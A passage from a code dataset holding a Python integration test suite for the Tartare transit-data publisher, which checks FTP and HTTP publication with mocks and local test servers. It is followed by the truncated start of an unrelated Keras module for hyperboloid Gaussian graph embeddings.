Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n# Stay tuned using\n# twitter @navitia\n# IRC #navitia on freenode\n# https://groups.google.com/d/forum/navitia\n# www.navitia.io\nimport copy\nimport ftplib\nimport json\nimport os\nimport tempfile\n\nimport mock\nimport pytest\nfrom freezegun import freeze_time\n\nfrom tartare.core.constants import (\n DATA_FORMAT_OSM_FILE,\n DATA_TYPE_PUBLIC_TRANSPORT,\n DATA_TYPE_GEOGRAPHIC,\n DATA_FORMAT_POLY_FILE,\n DATA_FORMAT_GTFS,\n DATA_FORMAT_NTFS,\n PUBLICATION_ENVIRONMENTS,\n)\nfrom tests.integration.test_mechanism import TartareFixture\nfrom tests.utils import get_response, assert_files_equals, _get_file_fixture_full_path\n\n\nclass TestDataPublisher(TartareFixture):\n def _create_contributor(\n self, id, url=\"http://canaltp.fr/gtfs.zip\", data_format=\"gtfs\", data_type=DATA_TYPE_PUBLIC_TRANSPORT\n ):\n contributor = {\n \"data_type\": data_type,\n \"id\": id,\n \"name\": id,\n \"data_prefix\": id,\n \"data_sources\": [\n {\n \"id\": \"ds_\" + data_format,\n \"name\": \"ds\" + data_format,\n \"data_format\": data_format,\n \"input\": {\n \"expected_file_name\": \"default.zip\",\n \"type\": \"auto\",\n \"url\": url,\n \"frequency\": {\"type\": \"daily\", \"hour_of_day\": 20},\n },\n }\n ],\n }\n resp = self.post(\"/contributors\", json.dumps(contributor))\n assert resp.status_code == 201\n return resp\n\n def test_publish_ftp(self, wiremock_server, init_ftp_upload_server):\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self._create_contributor(contributor_id, url)\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"input_data_source_ids\": [\"ds_gtfs\"],\n \"options\": {\n \"authent\": {\"username\": init_ftp_upload_server.user, \"password\": init_ftp_upload_server.password}\n },\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.full_export(contributor_id, coverage_id, \"2015-08-10T00:00:00Z\")\n\n # check if the 
file was successfully uploaded\n session = ftplib.FTP(\n init_ftp_upload_server.ip_addr, init_ftp_upload_server.user, init_ftp_upload_server.password\n )\n directory_content = session.nlst()\n assert len(directory_content) == 1\n assert \"{coverage_id}.zip\".format(coverage_id=coverage_id) in directory_content\n session.delete(\"{coverage_id}.zip\".format(coverage_id=coverage_id))\n session.quit()\n\n @freeze_time(\"2015-08-10\")\n def test_publish_ftp_with_directory(self, wiremock_server, init_ftp_upload_server):\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n ftp_username = \"tartare_user\"\n ftp_password = \"tartare_password\"\n filename = \"some_archive.zip\"\n directory = \"/ods\"\n\n session = ftplib.FTP(init_ftp_upload_server.ip_addr, ftp_username, ftp_password)\n # Create a directory in the ftp\n session.mkd(directory)\n\n url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self._create_contributor(contributor_id, url)\n # see password : tests/fixtures/authent/ftp_upload_users/pureftpd.passwd\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"input_data_source_ids\": [\"ds_gtfs\"],\n \"options\": {\"authent\": {\"username\": ftp_username, \"password\": ftp_password}, \"directory\": directory},\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.full_export(contributor_id, coverage_id)\n\n # check if the file was successfully uploaded\n directory_content = session.nlst(directory)\n assert len(directory_content) == 1\n assert \"{coverage_id}.zip\".format(coverage_id=coverage_id) in directory_content\n session.delete(\"{directory}/{coverage_id}.zip\".format(directory=directory, coverage_id=coverage_id))\n session.rmd(directory)\n\n @mock.patch(\"tartare.processes.fusio.Fusio.wait_for_action_terminated\")\n @mock.patch(\"requests.post\")\n @mock.patch(\"requests.get\")\n @freeze_time(\"2018-05-14\")\n def test_process_compute_ods_with_metadata_fusio(\n self, fusio_get, fusio_post, wait_for_action_terminated, wiremock_server, init_ftp_upload_server\n ):\n contributor_id = \"id_test\"\n coverage_id = \"my-coverage-id\"\n sample_data = \"some_archive.zip\"\n url = self.format_url(ip=wiremock_server.ip_addr, filename=sample_data, path=\"gtfs\")\n self.init_contributor(contributor_id, \"my_gtfs\", url)\n fusio_end_point = \"http://fusio-ihm.canaltp.fr/cgi-bin/fusio.dll\"\n processes = []\n input_data_source_ids = []\n for target_data_format in [DATA_FORMAT_GTFS, DATA_FORMAT_NTFS]:\n target_id = \"my_{}_data_source\".format(target_data_format)\n input_data_source_ids.append(target_id)\n processes.append(\n {\n \"id\": \"fusio_export\",\n \"type\": \"FusioExport\",\n \"target_data_source_id\": target_id,\n \"parameters\": {\"fusio_url\": fusio_end_point, \"export_data_format\": target_data_format},\n \"sequence\": 0,\n }\n )\n self.contributor_export(contributor_id)\n processes.append(\n {\n \"id\": \"compute-ods\",\n \"type\": \"ComputeODS\",\n \"input_data_source_ids\": input_data_source_ids,\n \"target_data_source_id\": \"ods_target_id\",\n \"sequence\": 2,\n }\n )\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"options\": {\n \"authent\": {\"username\": init_ftp_upload_server.user, \"password\": init_ftp_upload_server.password}\n },\n \"input_data_source_ids\": [\"ods_target_id\"],\n }\n license = {\"name\": \"my license\", \"url\": \"http://license.org/mycompany\"}\n 
self.init_coverage(coverage_id, processes, [publication_platform], license)\n\n fetch_url_gtfs = self.format_url(ip=wiremock_server.ip_addr, filename=sample_data)\n fetch_url_ntfs = self.format_url(ip=wiremock_server.ip_addr, path=\"\", filename=\"ntfs.zip\")\n fusio_post.side_effect = [\n get_response(200, self.get_fusio_response_from_action_id(\"gtfs-action-id\")),\n get_response(200, self.get_fusio_response_from_action_id(\"ntfs-action-id\")),\n ]\n fusio_get.side_effect = [\n get_response(200, self.get_fusio_export_url_response_from_action_id(\"gtfs-action-id\", fetch_url_gtfs)),\n get_response(200, self.get_fusio_export_url_response_from_action_id(\"ntfs-action-id\", fetch_url_ntfs)),\n ]\n self.full_export(contributor_id, coverage_id)\n\n def test_ods_file_exist(extract_path):\n expected_filename = \"ods_target_id.zip\".format(coverage_id=coverage_id)\n session = ftplib.FTP(\n init_ftp_upload_server.ip_addr, init_ftp_upload_server.user, init_ftp_upload_server.password\n )\n\n directory_content = session.nlst()\n assert len(directory_content) == 1\n assert expected_filename in directory_content\n\n transfered_full_name = os.path.join(extract_path, \"transfered_file.zip\")\n with open(transfered_full_name, \"wb\") as dest_file:\n session.retrbinary(\n \"RETR {expected_filename}\".format(expected_filename=expected_filename), dest_file.write\n )\n session.delete(expected_filename)\n session.quit()\n\n return transfered_full_name\n\n self.assert_ods_metadata(coverage_id, test_ods_file_exist)\n\n @freeze_time(\"2015-08-10\")\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(200), get_response(200)])\n def test_publish_environment_respect_sequence_order(self, mock_post, wiremock_server):\n contributor_id = \"contrib-seq\"\n cov_id = \"cov-sequence\"\n url = \"http://whatever.{env}/v0/jobs/il\"\n\n self._create_contributor(contributor_id, self.format_url(ip=wiremock_server.ip_addr, filename=\"sample_1.zip\"))\n publication_platform = {\"environment\": \"production\", \"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"]}\n publications = []\n for environment in PUBLICATION_ENVIRONMENTS:\n temp_platform = copy.copy(publication_platform)\n temp_platform[\"url\"] = temp_platform[\"url\"].format(env=environment)\n temp_platform[\"environment\"] = environment\n publications.append(temp_platform)\n self.init_coverage(cov_id, publications=publications)\n self.full_export(contributor_id, cov_id)\n for idx, environment in enumerate(PUBLICATION_ENVIRONMENTS):\n assert url.format(env=environment) == mock_post.call_args_list[idx][0][0]\n\n @freeze_time(\"2015-08-10\")\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(500), get_response(200)])\n def test_publish_platform_failed(self, mock_post, wiremock_server):\n contributor_id = \"contrib-pub-failed\"\n cov_id = \"cov-sequence\"\n url = \"http://whatever.fr/pub\"\n self._create_contributor(contributor_id, self.format_url(ip=wiremock_server.ip_addr, filename=\"sample_1.zip\"))\n publication_platform = {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"]}\n publications = []\n for environment in PUBLICATION_ENVIRONMENTS:\n temp_plat = copy.deepcopy(publication_platform)\n temp_plat[\"environment\"] = environment\n temp_plat[\"id\"] = \"id_\" + environment\n publications.append(temp_plat)\n\n self.init_coverage(cov_id, publications=publications)\n resp = self.full_export(contributor_id, cov_id)\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = 
self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data preproduction on \"), print(job)\n assert (\n job[\"error_message\"]\n == \"following publications failed: id_preproduction with message error during publishing on http://whatever.fr/pub, status code => 500\"\n ), print(job)\n assert job[\"state\"] == \"failed\"\n\n @freeze_time(\"2015-08-10\")\n @mock.patch(\n \"requests.post\",\n side_effect=[get_response(200), get_response(500), get_response(200), get_response(500), get_response(200)],\n )\n def test_publish_platform_failed_multi(self, mock_post, wiremock_server):\n contributor_id = \"contrib-pub-failed\"\n cov_id = \"cov-sequence\"\n url = \"http://whatever.fr/pub\"\n self._create_contributor(contributor_id, self.format_url(ip=wiremock_server.ip_addr, filename=\"sample_1.zip\"))\n publications = [\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"integration\", \"id\": \"integration_ok\"},\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"preproduction\", \"id\": \"preprod_ko_1\"},\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"preproduction\", \"id\": \"preprod_ok\"},\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"preproduction\", \"id\": \"preprod_ko_2\"},\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"production\", \"id\": \"prod_not_called\"},\n ]\n self.init_coverage(cov_id, publications=publications)\n resp = self.full_export(contributor_id, cov_id)\n # production not called but all of preprod yes\n assert mock_post.call_count == 4\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data preproduction on \"), print(job)\n assert (\n job[\"error_message\"]\n == \"following publications failed: preprod_ko_1 with message error during publishing on http://whatever.fr/pub, status code => 500 / preprod_ko_2 with message error during publishing on http://whatever.fr/pub, status code => 500\"\n ), print(job)\n assert job[\"state\"] == \"failed\"\n\n @mock.patch(\"requests.post\", side_effect=[get_response(200)])\n def test_publish_http(self, post_mock, wiremock_server):\n publish_url = \"http://tyr.whatever.com\"\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self._create_contributor(contributor_id, fetch_url)\n publication_platform = {\"environment\": \"production\", \"url\": publish_url, \"input_data_source_ids\": [\"ds_gtfs\"]}\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n resp = self.full_export(contributor_id, coverage_id, \"2015-08-10T00:00:00Z\")\n\n post_mock.assert_called_once()\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data production on \"), print(job)\n assert job[\"error_message\"] == \"\", print(job)\n assert job[\"state\"] == \"done\", print(job)\n\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(200)])\n @pytest.mark.parametrize(\n \"data_format,file_name\",\n [(DATA_FORMAT_OSM_FILE, \"empty_pbf.osm.pbf\"), (DATA_FORMAT_POLY_FILE, \"ile-de-france.poly\")],\n )\n def test_publish_navitia_with_osm_or_poly(self, post_mock, wiremock_server, data_format, file_name):\n 
publish_url = \"http://tyr.whatever.com\"\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n contributor_geo = \"geo\"\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self._create_contributor(contributor_id, fetch_url)\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, path=\"geo_data\", filename=file_name)\n self._create_contributor(contributor_geo, fetch_url, data_format=data_format, data_type=DATA_TYPE_GEOGRAPHIC)\n publication_platform = {\n \"environment\": \"production\",\n \"url\": publish_url,\n \"input_data_source_ids\": [\"ds_gtfs\", \"ds_\" + data_format],\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.contributor_export(contributor_id)\n self.contributor_export(contributor_geo)\n resp = self.coverage_export(coverage_id)\n\n assert post_mock.call_count == 2\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data production on \"), print(job)\n assert job[\"error_message\"] == \"\", print(job)\n assert job[\"state\"] == \"done\", print(job)\n\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(200), get_response(200)])\n def test_publish_navitia_with_osm_and_poly(self, post_mock, wiremock_server):\n publish_url = \"http://tyr.whatever.com\"\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n contributor_geo_id = \"geo\"\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self.init_contributor(contributor_id, \"gtfs_ds_id\", fetch_url)\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, path=\"geo_data\", filename=\"empty_pbf.osm.pbf\")\n self.init_contributor(\n contributor_geo_id, \"osm_ds_id\", fetch_url, data_format=DATA_FORMAT_OSM_FILE, data_type=DATA_TYPE_GEOGRAPHIC\n )\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, path=\"geo_data\", filename=\"ile-de-france.poly\")\n self.add_data_source_to_contributor(\n contributor_geo_id, \"poly_ds_id\", fetch_url, data_format=DATA_FORMAT_POLY_FILE\n )\n\n publication_platform = {\n \"environment\": \"production\",\n \"url\": publish_url,\n \"input_data_source_ids\": [\"gtfs_ds_id\", \"poly_ds_id\"],\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.contributor_export(contributor_id)\n self.contributor_export(contributor_geo_id)\n resp = self.coverage_export(coverage_id)\n\n assert post_mock.call_count == 2\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data production on \"), print(job)\n assert job[\"error_message\"] == \"\", print(job)\n assert job[\"state\"] == \"done\", print(job)\n\n @mock.patch(\"requests.post\")\n @pytest.mark.parametrize(\n \"data_format,file_name\",\n [(DATA_FORMAT_OSM_FILE, \"empty_pbf.osm.pbf\"), (DATA_FORMAT_POLY_FILE, \"ile-de-france.poly\")],\n )\n def test_publish_only_osm_or_poly(self, post_mock, wiremock_server, data_format, file_name):\n publish_url = \"http://tyr.whatever.com\"\n coverage_id = \"default\"\n contributor_geo = \"geo\"\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, path=\"geo_data\", filename=file_name)\n self._create_contributor(contributor_geo, fetch_url, data_format=data_format, data_type=DATA_TYPE_GEOGRAPHIC)\n publication_platform = {\n \"environment\": \"production\",\n 
\"url\": publish_url,\n \"input_data_source_ids\": [\"ds_\" + data_format],\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n self.full_export(contributor_geo, coverage_id, \"2015-08-10T00:00:00Z\")\n\n assert post_mock.call_count == 1\n\n def test_publish_modified_fixture_from_contributor_process(self, init_ftp_upload_server, wiremock_server):\n self.init_contributor(\n \"c1\", \"ds1\", self.format_url(wiremock_server.ip_addr, \"minimal_gtfs.zip\"), expected_file_name=\"cov_id.zip\"\n )\n self.add_data_source_to_contributor(\n \"c1\",\n \"dcid\",\n self.format_url(\n wiremock_server.ip_addr,\n \"sanitize_publish_modified_fixture_from_contributor_process.json\",\n path=\"sanitize_gtfs\",\n ),\n \"sanitize_config\",\n )\n self.add_process_to_contributor(\n {\n \"sequence\": 0,\n \"input_data_source_ids\": [\"ds1\"],\n \"target_data_source_id\": \"export_id\",\n \"type\": \"SanitizeGTFS\",\n \"configuration_data_sources\": [{\"name\": \"sanitize_config\", \"ids\": [\"dcid\"]}],\n },\n \"c1\",\n )\n self.contributor_export(\"c1\")\n self.init_coverage(\"cov_id\")\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"input_data_source_ids\": [\"export_id\"],\n \"options\": {\n \"authent\": {\"username\": init_ftp_upload_server.user, \"password\": init_ftp_upload_server.password}\n },\n }\n self.add_publication_platform_to_coverage(publication_platform, \"cov_id\")\n self.coverage_export(\"cov_id\")\n # check that export_id data set is the updated gtfs\n export_gridfs_id = self.get_gridfs_id_from_data_source(\"c1\", \"export_id\")\n export_fixture = \"gtfs/minimal_gtfs_and_agency.zip\"\n self.assert_gridfs_equals_fixture(export_gridfs_id, export_fixture)\n # check that ds1 data set is the original gtfs\n input_gridfs_id = self.get_gridfs_id_from_data_source(\"c1\", \"ds1\")\n input_fixture = \"gtfs/minimal_gtfs.zip\"\n self.assert_gridfs_equals_fixture(input_gridfs_id, input_fixture)\n # check that published data set is the updated gtfs\n session = ftplib.FTP(\n init_ftp_upload_server.ip_addr, init_ftp_upload_server.user, init_ftp_upload_server.password\n )\n\n directory_content = session.nlst()\n assert len(directory_content) == 1\n expected_filename = \"export_id.zip\"\n assert expected_filename in directory_content\n\n # check that meta data from file on ftp server are correct\n with tempfile.TemporaryDirectory() as tmp_dirname:\n transfered_full_name = os.path.join(tmp_dirname, \"transfered_file.zip\")\n with open(transfered_full_name, \"wb\") as dest_file:\n session.retrbinary(\n \"RETR {expected_filename}\".format(expected_filename=expected_filename), dest_file.write\n )\n session.delete(expected_filename)\n assert_files_equals(transfered_full_name, _get_file_fixture_full_path(export_fixture))\n session.quit()\n\n @mock.patch(\"tartare.core.publisher.Publisher.publish\")\n def test_publish_only_enabled(self, mock_pusblish):\n self.init_contributor(\"cid\", \"dsid1\", \"http://url.com\")\n self.add_data_source_to_contributor(\"cid\", \"dsid2\", \"http://url.com\")\n self.add_data_source_to_contributor(\"cid\", \"dsid3\", \"http://url.com\")\n self.add_data_source_to_contributor(\"cid\", \"dsid4\", \"http://url.com\")\n url = \"http://whatever.fr/pub\"\n publications = [\n {\n \"url\": url,\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"integration_yes\",\n \"enabled\": True,\n },\n {\n \"url\": url,\n \"input_data_source_ids\": [\"dsid2\"],\n 
\"environment\": \"preproduction\",\n \"id\": \"preprod_no\",\n \"enabled\": False,\n },\n {\n \"url\": url,\n \"input_data_source_ids\": [\"dsid3\"],\n \"environment\": \"preproduction\",\n \"id\": \"preprod_yes\",\n \"enabled\": True,\n },\n {\n \"url\": url,\n \"input_data_source_ids\": [\"dsid4\"],\n \"environment\": \"production\",\n \"id\": \"prod_no\",\n \"enabled\": False,\n },\n ]\n self.init_coverage(\"covid\", publications=publications)\n self.coverage_export(\"covid\")\n # only enabled called\n assert mock_pusblish.call_count == 2\n assert mock_pusblish.call_args_list[0][0][0] == [\"dsid1\"]\n assert mock_pusblish.call_args_list[1][0][0] == [\"dsid3\"]\n\n def test_publish_unknown_coverage(self):\n raw = self.publish(\"unknown\", check_success=False)\n self.assert_failed_call(raw, 404)\n\n def test_publish_unknown_publications(self):\n self.init_coverage(\"covid\")\n self.add_data_source_to_coverage(\"covid\", \"dsid1\", \"http://url1.com\")\n raw = self.publish(\"covid\", publication_ids=[\"unknown\"], check_success=False)\n details = self.assert_failed_call(raw, 400)\n assert details == {\"error\": \"coverage covid does not contain any publications\", \"message\": \"Invalid arguments\"}\n self.add_publication_platform_to_coverage(\n {\n \"url\": \"http://whatever.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"existing_pub\",\n },\n \"covid\",\n )\n raw = self.publish(\"covid\", publication_ids=[\"unexisting_pub\"], check_success=False)\n details = self.assert_failed_call(raw, 400)\n assert details == {\n \"error\": \"no publications found matching provided publication_ids\",\n \"message\": \"Invalid arguments\",\n }\n self.init_coverage(\"covid2\")\n self.add_publication_platform_to_coverage(\n {\n \"url\": \"http://whatever.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"existing_pub_disabled\",\n \"enabled\": False,\n },\n \"covid2\",\n )\n raw = self.publish(\"covid2\", check_success=False)\n details = self.assert_failed_call(raw, 400)\n assert details == {\"error\": \"no publications enabled found for coverage covid2\", \"message\": \"Invalid arguments\"}\n\n @mock.patch(\"tartare.tasks.coverage_publication.si\")\n def test_publish_action(self, mock_pusblish_task):\n self.init_contributor(\"cid\", \"dsid1\", \"http://url1.com\")\n self.init_coverage(\n \"covid\",\n publications=[\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_1\",\n },\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_2\",\n },\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_3\",\n \"enabled\": False,\n },\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_4\",\n },\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_5\",\n },\n ],\n )\n # filter 3 publications but one of them is not enabled\n self.publish(\"covid\", publication_ids=[\"pub_1\", \"pub_3\", \"pub_5\"])\n assert len(mock_pusblish_task.call_args_list[0][0][1]) == 2\n assert [pub.id for pub in mock_pusblish_task.call_args_list[0][0][1]] == [\"pub_1\", \"pub_5\"]\n job = mock_pusblish_task.call_args_list[0][0][0]\n assert job.action_type == 
\"coverage_publication\"\n assert job.coverage_id == \"covid\"\n # filter 3 publications but one of them is not enabled and one of them is unknown\n self.publish(\"covid\", publication_ids=[\"pub_1\", \"pub_3\", \"unknown\"])\n assert len(mock_pusblish_task.call_args_list[1][0][1]) == 1\n assert [pub.id for pub in mock_pusblish_task.call_args_list[1][0][1]] == [\"pub_1\"]\n # filter no publications\n self.publish(\"covid\")\n assert len(mock_pusblish_task.call_args_list[2][0][1]) == 4\n\n def test_publish_ftp_with_action(self, wiremock_server, init_ftp_upload_server):\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self.init_contributor(contributor_id, \"dsid\", url)\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"input_data_source_ids\": [\"dsid\"],\n \"options\": {\n \"authent\": {\"username\": init_ftp_upload_server.user, \"password\": init_ftp_upload_server.password}\n },\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.contributor_export(contributor_id)\n job = self.publish(coverage_id)\n assert job[\"state\"] == \"done\"\n assert job[\"coverage_id\"] == coverage_id\n assert job[\"action_type\"] == \"coverage_publication\"\n assert job[\"step\"].startswith(\"publish_data production on ftp://{}\".format(init_ftp_upload_server.ip_addr))\n assert job == self.get_coverage(coverage_id)[\"last_job\"]\n\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(500), get_response(200)])\n def test_publish_crash_breaks_chain(self, mock_pusblish, wiremock_server):\n self.init_contributor(\"cid\", \"dsid1\", self.format_url(wiremock_server.ip_addr, \"some_archive.zip\"))\n url = \"http://whatever.fr/pub\"\n publications = [\n {\"url\": url, \"input_data_source_ids\": [\"dsid1\"], \"environment\": \"integration\", \"id\": \"integration_yes\"},\n {\"url\": url, \"input_data_source_ids\": [\"dsid1\"], \"environment\": \"preproduction\", \"id\": \"preprod_no\"},\n {\"url\": url, \"input_data_source_ids\": [\"dsid1\"], \"environment\": \"preproduction\", \"id\": \"preprod_yes\"},\n {\"url\": url, \"input_data_source_ids\": [\"dsid1\"], \"environment\": \"production\", \"id\": \"prod_no\"},\n ]\n self.contributor_export(\"cid\")\n self.init_coverage(\"covid\", publications=publications)\n job = self.publish(\"covid\")\n assert mock_pusblish.call_count == 3\n assert job[\"state\"] == \"failed\"\n","sub_path":"tests/integration/mongo/data_publisher_test.py","file_name":"data_publisher_test.py","file_ext":"py","file_size_in_byte":30454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"450567200","text":"import numpy as np\n\nimport keras.backend as K\nfrom keras.layers import Input, Layer, Concatenate\nfrom keras.models import Model\nfrom keras.initializers import Constant, RandomNormal\nfrom keras.regularizers import l2\n\nimport tensorflow as tf\n\nimport functools\n\ndef kullback_leibler_divergence(mus, sigmas):\n\n\t# ignore zero t coordinate\n\tmus = mus[...,:-1]\n\n\t# source_mus, target_mus = mus[:,:1], mus[:,1:]\n\n\tk = K.int_shape(mus)[-1]\n\n\tsigmas = K.maximum(sigmas, K.epsilon())\n\n\tsource_sigma = sigmas[:,:1]\n\ttarget_sigma = sigmas[:,1:]\n\n\tsigma_ratio = target_sigma / source_sigma\n\tsigma_ratio = K.maximum(sigma_ratio, K.epsilon())\n\n\ttrace_fac = K.sum(sigma_ratio,\n\t\taxis=-1, 
keepdims=True)\n\n\t# mu_sq_diff = K.sum(K.square(target_mus - source_mus) / \\\n\t# \tsource_sigma,\n\t# \taxis=-1, keepdims=True) # assume sigma is diagonal\n\tmu_sq_diff = K.sum(K.square(mus) / \\\n\t\tsource_sigma,\n\t\taxis=-1, keepdims=True) # assume sigma is diagonal\n\n\tlog_det = K.sum(K.log(sigma_ratio),\n\t\taxis=-1, keepdims=True)\n\n\treturn 0.5 * (trace_fac + mu_sq_diff - k - log_det)\n\ndef minkowski_dot(x, y):\n\tassert len(x.shape) == len(y.shape)\n\treturn K.sum(x[...,:-1] * y[...,:-1], axis=-1, keepdims=True) - x[...,-1:] * y[...,-1:]\n\ndef minkowski_norm(x):\n\treturn K.sqrt(K.maximum(\n\t\tminkowski_dot(x, x), 0.))\n\ndef parallel_transport(p, q, x):\n\talpha = -minkowski_dot(p, q)\n\talpha = K.maximum(alpha, 1+K.epsilon())\n\n\treturn x + minkowski_dot(q - alpha * p, x) * (p + q) / \\\n\t\tK.maximum(alpha + 1, K.epsilon())\n\ndef logarithmic_map(p, x):\n\tassert len(p.shape) == len(x.shape)\n\n\talpha = -minkowski_dot(p, x)# + K.epsilon()\n\n\talpha = K.maximum(alpha, 1 + K.epsilon())\n\n\tret = tf.acosh(alpha) * (x - alpha * p) / \\\n\t\tK.maximum(K.sqrt(K.maximum(alpha ** 2 - 1., 0.)),\n\t\tK.epsilon())\n\n\treturn ret\n\ndef hyperboloid_initializer(shape, r_max=1e-5):\n\n\tdef poincare_ball_to_hyperboloid(X, append_t=True):\n\t\tx = 2 * X\n\t\tt = 1. + K.sum(K.square(X), axis=-1, keepdims=True)\n\t\tif append_t:\n\t\t\tx = K.concatenate([x, t], axis=-1)\n\t\treturn 1 / (1. - K.sum(K.square(X), axis=-1, keepdims=True)) * x\n\n\tw = tf.random_uniform(shape=shape, \n\t\tminval=-r_max, \n\t\tmaxval=r_max, \n\t\tdtype=K.floatx())\n\treturn poincare_ball_to_hyperboloid(w)\n\nclass HyperboloidGaussianEmbeddingLayer(Layer):\n\n\tdef __init__(self,\n\t\tnum_nodes,\n\t\tembedding_dim,\n\t\t**kwargs):\n\t\tsuper(HyperboloidGaussianEmbeddingLayer, self).__init__(**kwargs)\n\t\tself.num_nodes = num_nodes\n\t\tself.embedding_dim = embedding_dim\n\t\tself.mu_zero = K.constant(\\\n\t\t\tnp.append(np.zeros((1, 1, self.embedding_dim)), \n\t\t\t\tnp.ones((1,1,1)), axis=-1))\n\n\tdef build(self, input_shape):\n\t\t# Create a trainable weight variable for this layer.\n\t\tself.embedding = self.add_weight(name='hyperbolic_embedding',\n\t\t\tshape=(self.num_nodes, self.embedding_dim),\n\t\t\tinitializer=hyperboloid_initializer,\n\t\t\ttrainable=True)\n\t\tassert self.embedding.shape[1] == self.embedding_dim + 1\n\t\tself.sigmas = self.add_weight(name='euclidean_covariance',\n\t\t\tshape=(self.num_nodes, self.embedding_dim),\n\t\t\tinitializer=functools.partial(\n\t\t\t\ttf.random_normal, \n\t\t\t\tstddev=1e-3,\n\t\t\t\tdtype=K.floatx()),\n\t\t\tregularizer=l2(1e-4),\n\t\t\ttrainable=True)\n\t\tsuper(HyperboloidGaussianEmbeddingLayer, self).build(input_shape)\n\n\tdef call(self, idx):\n\n\t\tsource_embedding = tf.gather(self.embedding, \n\t\t\tidx[:,:1])\n\t\ttarget_embedding = tf.gather(self.embedding, \n\t\t\tidx[:,1:])\n\n\t\tto_tangent_space = logarithmic_map(\n\t\t\tsource_embedding,\n\t\t\ttarget_embedding)\n\n\t\tto_tangent_space_mu_zero = parallel_transport(\n\t\t\tsource_embedding,\n\t\t\tself.mu_zero,\n\t\t\tto_tangent_space)\n\n\t\tsigmas = tf.gather(self.sigmas, 